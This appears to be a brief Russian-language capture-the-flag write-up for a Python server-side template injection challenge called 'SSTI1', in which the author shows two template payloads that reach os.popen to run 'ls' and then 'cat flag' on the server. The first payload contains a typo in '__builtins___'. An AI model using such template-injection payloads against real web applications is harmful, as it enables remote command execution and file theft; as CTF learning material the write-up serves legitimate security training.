Задание SSTI1
Исследуя Python SSTI, я обнаружил отличный пост OnSecurity здесь подробно описаны различные способы полезной нагрузки. Например, выполняется следующая полезная нагрузка ls в том же каталоге, что и сервер (рис 1)
{{request.application.__globals__.__builtins___.__import__('os').popen('ls').read()}}
Пробуем переделать payload для запуска cat flag (рис 2):
{{request.application.__globals__.__builtins__.__import__('os').popen('cat flag').read()}}
